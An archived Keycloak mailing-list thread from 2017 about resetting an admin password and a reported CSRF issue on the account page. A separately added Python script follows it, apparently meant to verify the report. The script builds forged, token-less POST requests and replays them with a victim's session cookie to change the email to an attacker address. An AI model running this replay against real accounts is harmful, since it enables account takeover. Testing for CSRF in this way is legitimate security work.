[keycloak-user] Possible CSRF issue in account page.

Stian Thorgersen sthorger at redhat.com
Fri Mar 24 03:57:44 EDT 2017


Please send me the details about this in a direct mail, but it is protected
against CSRF, and unless you are using a really old version of Keycloak I
doubt this is an actual vulnerability.

On 23 March 2017 at 13:13, Ushanas Shastri <ushanas at gmail.com> wrote:

> Hello,
>
> We have a page where the user account details can be seen (the KeyCloak
> realm/account page).
>
> On that page, the user can update his email address etc.
> As part of security testing, we found that this page is vulnerable to Cross
> Site Request Forgery.
>
> Is this a known issue, or should I report in JIRA?
> Also, is there a way to configure some security options in KeyCloak to
> prevent CSRF?
>
> Regards, Ushanas.
>
> On 23-Mar-2017 10:28 AM, "Ushanas Shastri" <ushanas at gmail.com> wrote:
>
> Thank you, this works.
>
> On 22 March 2017 at 21:39, Marko Strukelj <mstrukel at redhat.com> wrote:
>
> > You can add a new admin user by using add-user-keycloak script:
> > https://keycloak.gitbooks.io/documentation/content/server_admin/topics/initialization.html.
> >
> > Then you can log into the Admin Console and set a new password for
> > original admin user.
> >
> > On Wed, Mar 22, 2017 at 12:51 PM, Ushanas Shastri <ushanas at gmail.com>
> > wrote:
> >
> >> Hello,
> >> How do I reset the admin password? I don't have the admin password, and
> >> want to be able to reset it like it was a new install.
> >>
> >> Regards, Ushanas.
> >> _______________________________________________
> >> keycloak-user mailing list
> >> keycloak-user at lists.jboss.org
> >> https://lists.jboss.org/mailman/listinfo/keycloak-user
> >>
> >
> >
>
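As an added check (this is not code from the thread or from Keycloak itself), the script below does what a tester would do to confirm or refute the report above: it parses a fetched account-page form for a per-session synchronizer token, classifies the form as protected, weakly protected or missing a token, and builds the forged POST body a cross-site page would send (every field except the token) so it can be replayed with the victim's cookie. The hidden field name `stateChecker`, the realm path, the cookie handling and the sample HTML are assumptions; adjust them to the deployment under test.

```python
"""Check whether a state-changing form carries an anti-CSRF token and
replay it without that token. Added example, not Keycloak's own code."""
import sys
import urllib.error
import urllib.parse
import urllib.request
from html.parser import HTMLParser

# Assumption: the account console protects its POST forms with a hidden
# per-session field named "stateChecker". Change this for other deployments.
TOKEN_FIELD = "stateChecker"
MIN_TOKEN_LEN = 16


class _FormScanner(HTMLParser):
    """Collect action/method of each form and every hidden input inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "",
                         "method": (a.get("method") or "get").lower(),
                         "hidden": {}}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            if (a.get("type") or "text").lower() == "hidden" and a.get("name"):
                self._cur["hidden"][a["name"]] = a.get("value") or ""

    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None


def scan_forms(html):
    """Return a list of {action, method, hidden} dicts, one per <form>."""
    p = _FormScanner()
    p.feed(html)
    return p.forms


def assess_form(form, field=TOKEN_FIELD):
    """Classify a form: 'protected', 'weak-token', 'missing' or 'not-state-changing'."""
    if form["method"] != "post":
        return "not-state-changing"
    token = form["hidden"].get(field, "")
    if not token:
        return "missing"
    # A short or low-entropy token can be guessed by the attacker's page,
    # so it does not count as protection.
    if len(token) < MIN_TOKEN_LEN or len(set(token)) < 8:
        return "weak-token"
    return "protected"


def forged_body(form, field=TOKEN_FIELD, overrides=None):
    """POST body a cross-site page could send: all hidden fields except the token."""
    fields = {k: v for k, v in form["hidden"].items() if k != field}
    fields.update(overrides or {})
    return urllib.parse.urlencode(fields).encode()


def replay_without_token(base_url, form, cookie_header, overrides):
    """Submit the forged body with the victim's session cookie; returns (status, body).
    A protected server must not apply the change; inspect the body to confirm."""
    url = urllib.parse.urljoin(base_url, form["action"])
    req = urllib.request.Request(
        url, data=forged_body(form, overrides=overrides), method="POST",
        headers={"Cookie": cookie_header,
                 "Content-Type": "application/x-www-form-urlencoded"})
    try:
        with urllib.request.urlopen(req) as resp:
            return resp.status, resp.read().decode(errors="replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode(errors="replace")


# Constructed samples (not captures of a real Keycloak page).
SAMPLE_PROTECTED = """
<form action="/auth/realms/demo/account/" method="post">
  <input type="hidden" name="stateChecker" value="1f3c9a7bd2e04c6fa8b9d1e2f3a4b5c6">
  <input type="text" name="email" value="alice@example.com">
  <button type="submit">Save</button>
</form>
"""
SAMPLE_UNPROTECTED = """
<form action="/auth/realms/demo/account/" method="post">
  <input type="text" name="email" value="alice@example.com">
  <button type="submit">Save</button>
</form>
"""

if __name__ == "__main__":
    for name, html in (("protected", SAMPLE_PROTECTED), ("unprotected", SAMPLE_UNPROTECTED)):
        form = scan_forms(html)[0]
        print(name, "->", assess_form(form), forged_body(form, overrides={"email": "attacker@evil.example"}))
    # Live replay: python csrf_check.py https://idp.example/ '<fetched-form.html>' 'KEYCLOAK_SESSION=...'
    if len(sys.argv) == 4:
        form = scan_forms(open(sys.argv[2]).read())[0]
        print(replay_without_token(sys.argv[1], form, sys.argv[3], {"email": "attacker@evil.example"}))
```

Fetch the form with the victim's own session (the token is bound to that session, so it has to come from a fresh GET), run the classifier, then replay; if the e-mail changes without the token the report stands, and if the server answers with an error page and leaves the account untouched the protection Stian describes is in place. The classifier is a heuristic: a long, high-entropy token that is not bound to the session would still pass it, so compare tokens across two sessions as well.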

